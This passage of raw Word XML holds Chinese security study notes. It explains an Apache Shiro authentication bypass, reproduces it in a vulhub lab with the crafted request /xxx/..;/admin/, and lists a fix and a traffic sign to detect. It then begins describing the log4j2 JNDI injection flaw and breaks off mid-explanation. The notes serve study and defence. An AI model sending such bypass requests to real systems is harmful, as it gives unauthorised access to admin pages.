        <w:ind w:left="240" w:hangingChars="100" w:hanging="24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 xml:space="preserve">  DefaultShiroFilterChainDefinition chainDefinition = new DefaultShiroFilterChainDefinition();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A5FC631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 xml:space="preserve">  chainDefinition.addPathDefinition("/login.html", "authc"); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="374321D0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 xml:space="preserve">  chainDefinition.addPathDefinition("/logout", "logout"); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25750480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 xml:space="preserve">  chainDefinition.addPathDefinition("/admin/**", "authc"); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="153A7779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 xml:space="preserve">  return chainDefinition;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F060FA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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2694854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Ant格式解释如下：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ACA441F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? 匹配一个字符；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CA423BE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* 匹配零个或多个字符；           例如 `/user/test`字符</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FFBF8A1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** 匹配路径中的零个或多个路径。  例如 `/user/test/`路径</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="707E12B3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④漏洞产生流程分析</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FA0518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以http://localhost:8080/xxxx/..;/admin/index为例，一步步分析整个流程的请求过程</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3465065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1、首先客户端请求URL如下：http://localhost:8080/xxxx/..;/admin/index</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22B1A82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2、然后URL会传入到shiro框架： </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="148BB004" w14:textId="77777777" w:rsidR="00615185" w:rsidRDefault="00717A0E">
      <w:pPr>
        <w:widowControl/>
        <w:spacing w:before="100"/>
        <w:ind w:firstLineChars="100" w:firstLine="24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程序进入到shiro的decodeAndCleanUriString方法，截断分号后面所有的请求，返回一个新</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DEC3B8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的URL：</w:t>
      </w:r>
      <w:hyperlink r:id="rId43" w:history="1">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
            <w:sz w:val="24"/>
          </w:rPr>
          <w:t>http://localhost:8080/xxxx/..</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="7AB3AA9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  然后调用normalize()对decodeAndCleanUriString()处理得到的路径进行标准化处理，处理方</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59A43DD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法包括：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>替换反斜线      替换 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>// </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>为 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">     替换</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t> /./ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>为 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">      替换</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t> /../ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>为 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CE4688D" w14:textId="77777777" w:rsidR="00615185" w:rsidRDefault="00717A0E">
      <w:pPr>
        <w:widowControl/>
        <w:spacing w:before="100"/>
        <w:ind w:firstLineChars="100" w:firstLine="24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然后经过getPathWithinApplication()函数的处理，最终shiro要校验的URL就是/xxxx/..。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="318B92B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最终进入org.apache.shiro.web.filter.mgt.PathMatchingFilterChainResolver中getChain()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="528901E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方法会URL校验.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D1AB8F5" w14:textId="77777777" w:rsidR="00615185" w:rsidRDefault="00717A0E">
      <w:pPr>
        <w:widowControl/>
        <w:spacing w:before="100"/>
        <w:ind w:firstLineChars="100" w:firstLine="24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由于 /xxxx/..并不会匹配到/admin/**，所以shiro权限校验就会通过。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3536782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3、最后原始请求/xxxx/..;/admin/index会进入到springboot里：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05AB5DD6" w14:textId="77777777" w:rsidR="00615185" w:rsidRDefault="00717A0E">
      <w:pPr>
        <w:widowControl/>
        <w:spacing w:before="100"/>
        <w:ind w:firstLineChars="100" w:firstLine="24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springboot对每个进入的request请求进行处理，找到自己所对应的mapping。具体匹配方式</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A3B980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在:org.springframework.web.util.UrlPathHelper中的getPathWithinServletMapping()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B445B12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getPathWithinServletMapping()在一般情况下返回的就是servletPath，所以本次返回的就</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0866BE8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是/admin/index。最终到/admin/index对应的requestMapping，就成功地访问了后台请求。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68A7CD4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例如：如果URL请求是 /xxx/..;/admin/，</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="087A27C2" w14:textId="77777777" w:rsidR="00615185" w:rsidRDefault="00717A0E">
      <w:pPr>
        <w:widowControl/>
        <w:spacing w:before="100"/>
        <w:ind w:firstLineChars="300" w:firstLine="72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Shiro内部处理后会得到校验URL为 /xxx/..，并校验通过。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5153FB97" w14:textId="77777777" w:rsidR="00615185" w:rsidRDefault="00717A0E">
      <w:pPr>
        <w:widowControl/>
        <w:spacing w:before="100"/>
        <w:ind w:firstLineChars="300" w:firstLine="72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然后SpringBoot处理 /xxx/..;/admin/，最终请求 /admin/，从而成功访问后台。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DE7BFF3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⑤漏洞复现</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EBB9CE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使用vulhub提供的靶场环境，访问网址看效果：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E800D28" w14:textId="77777777" w:rsidR="00615185" w:rsidRDefault="00717A0E">
      <w:pPr>
        <w:widowControl/>
        <w:spacing w:line="0" w:lineRule="atLeast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noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300" wp14:anchorId="2A8E2ACB" wp14:editId="2B0C7754">
            <wp:extent cx="5974715" cy="1617980"/>
            <wp:effectExtent l="0" t="0" r="14605" b="12700"/>
            <wp:docPr id="1436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图片 118"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId44"/>
                    <a:srcRect t="3076" b="20955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5A84C" w14:textId="77777777" w:rsidR="00615185" w:rsidRDefault="00615185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</w:p>
    <w:p w14:paraId="2F96539C" w14:textId="77777777" w:rsidR="00615185" w:rsidRDefault="00615185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</w:p>
    <w:p w14:paraId="35126602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刷新一下页面抓包：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DE02881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184A933B" wp14:editId="7FFEFD5F">
            <wp:extent cx="5976620" cy="1492250"/>
            <wp:effectExtent l="0" t="0" r="12700" b="1270"/>
            <wp:docPr id="1438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图片 1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EA52B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后修改数据包直接请求管理页面 /admin/ ，发现无法访问，将会被重定向到登录页面：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04934754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744B1587" wp14:editId="7F85CB28">
            <wp:extent cx="5974715" cy="1129665"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1439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" name="图片 121"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId46"/>
                    <a:srcRect b="39572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419CA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构造恶意请求 /xxx/..;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">/admin/ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>，即可绕过权限校验，访问到管理页面：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00FE1DAC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4ACFCC1F" wp14:editId="20D68E37">
            <wp:extent cx="5968365" cy="982980"/>
            <wp:effectExtent l="0" t="0" r="5715" b="7620"/>
            <wp:docPr id="1440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" name="图片 122"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId47"/>
                    <a:srcRect b="42607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074F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浏览器上访问试试：192.168.1.9:8080/xxx/..;/admin/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34B6218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看到了登录成功之后的管理界面：漏洞复现成功</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A31872F" w14:textId="77777777" w:rsidR="00615185" w:rsidRDefault="00717A0E">
      <w:pPr>
        <w:widowControl/>
        <w:spacing w:before="100"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300" wp14:anchorId="621A9C5C" wp14:editId="31ED6118">
            <wp:extent cx="5974080" cy="1559560"/>
            <wp:effectExtent l="0" t="0" r="0" b="10160"/>
            <wp:docPr id="1441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" name="图片 123"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId48"/>
                    <a:srcRect b="6494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BE250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⑥漏洞防御</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DC5FD1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下载最新版的Apache shiro就行</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F8C2A82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⑦流量特征</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F47A980" w14:textId="77777777" w:rsidR="00615185" w:rsidRDefault="00717A0E">
      <w:pPr>
        <w:widowControl/>
        <w:spacing w:before="100"/>
        <w:ind w:left="480" w:hangingChars="200" w:hanging="480"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>看URL路径中的异常符号：请求里有没有.号或者;符号之类的异常符号</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B3E5909" w14:textId="77777777" w:rsidR="00615185" w:rsidRDefault="00717A0E">
      <w:pPr>
        <w:spacing w:before="100" w:line="0" w:lineRule="atLeast"/>
        <w:outlineLvl w:val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二、Apache log4j2 JNDI注入漏洞原理，特征，如何判断攻击成功？</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2994C77A" w14:textId="2DFB7C64" w:rsidR="00717A0E" w:rsidRPr="00B05B36" w:rsidRDefault="00717A0E" w:rsidP="00B05B36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该漏洞的CVE编号：CVE-2021-44228和CNVD-2021-95919</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AF088D0" w14:textId="23DFD19C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2.1 Log4j2简介</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58BD6F59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①log4j和log4j2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="766596B9" w14:textId="77777777" w:rsidR="00615185" w:rsidRDefault="00717A0E">
      <w:pPr>
        <w:widowControl/>
        <w:spacing w:before="100"/>
        <w:ind w:leftChars="228" w:left="479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log4j是 Apache 的一个开源日志库，是一个基于 Java 的日志记录框架。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32543EE7" w14:textId="77777777" w:rsidR="00615185" w:rsidRDefault="00717A0E">
      <w:pPr>
        <w:widowControl/>
        <w:spacing w:before="100"/>
        <w:ind w:leftChars="228" w:left="479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log4j2是log4j 的后继者，其中引入了大量丰富的特性，可以控制日志信息输送的目的地为</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64FDFBF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控制台、文件、GUI 组建等，被应用于业务系统开发，用于记录程序输入输出日志信息，log4j2 中</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EB7D04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存在JNDI注入漏洞，当程序记录用户输入的数据时，即可触发该漏洞，成功利用该漏洞可在目标</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CBD16D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服务器上执行任意代码。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D213B99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②什么是JNDI</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EF8372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JNDI是Java Naming and Directory Interface的缩写，是Java中用于访问各种命名和目录</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43695D9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服务的API（应用程序编程接口）。JNDI提供了一种标准的方式来访问各种命名和目录服务，从指</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C39269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定的远程服务器获取并加载对象，其中常用的协议包括 RMI（远程方法调用）和 LDAP（轻量目录</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7789CDB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访问协议）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CA69A8E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2.2 漏洞原理</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E84442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sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>受此影响应用程序和组件：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53367A4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spring-boot-strater-log4j2、Apache Solr、Apache Flink和Apache Druid等。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BFE0341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①原理</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ACFD26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Apache Log4j是个基于</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:color w:val="00B050"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Java</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:color w:val="00B050"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>的日志记录工具，漏洞是因为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:color w:val="00B050"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Log4j2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:color w:val="00B050"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>组件中</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:color w:val="00B050"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>lookup</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:color w:val="00B050"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>功能的实现</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61C82BC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类</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:color w:val="00B050"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>JndiLookup</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:color w:val="00B050"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>的设计缺陷导致，这个类存在于</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:color w:val="00B050"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>log4j-corexxx.jar</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:color w:val="00B050"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>中</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57459557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该漏洞主要是由于日志在打印时当遇到${后，以</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:color w:val="00B050"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:color w:val="00B050"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>号作分割，将表达式内容分割成两部分，前</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="237F0F1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面一部分</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:color w:val="00B050"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>prefix</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:color w:val="00B050"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>，后面部分作为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:color w:val="00B050"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>key</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:color w:val="00B050"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>，然后通过</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:color w:val="00B050"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>prefix</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:color w:val="00B050"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>找对应的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:color w:val="00B050"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>lookup</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:color w:val="00B050"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>，通过对应的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:color w:val="00B050"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>lookup</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:color w:val="00B050"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> 实</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C7288B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例调用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:color w:val="00B050"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>lookup</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:color w:val="00B050"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>方法，最后将</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:color w:val="00B050"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>key</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:color w:val="00B050"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>作为参数带入执行，引发远程代码执行漏洞。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30F3F0D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核心原理为，在正常的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:color w:val="00B050"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>log</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:color w:val="00B050"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>处理过程中对</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:color w:val="00B050"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>**${**</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:color w:val="00B050"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>这两个紧邻的字符做了检测，一旦匹配到类似</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="196BDE9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于表达式结构的字符串就会触发替换机制，将表达式的内容替换为表达式解析后的内容，而不是表</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A48442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达式本身，从而导致攻击者构造符合要求的表达式供系统执行。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="216BE743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lastRenderedPageBreak/>
        <w:t>日志在打印时当遇到</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:color w:val="00B050"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>${</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:color w:val="00B050"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>后，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:color w:val="00B050"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Interpolator</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:color w:val="00B050"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>类以</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:color w:val="00B050"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:color w:val="00B050"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>号作为分割，将表达式内容分割成两部分，前</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4393AD5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 xml:space="preserve">面部分作为 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:color w:val="00B050"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>prefix</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:color w:val="00B050"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">，后面部分作为 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:color w:val="00B050"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>key</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:color w:val="00B050"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>。然后通过</w:t>
      </w:r>
      <w:r>
        <w:rPr>
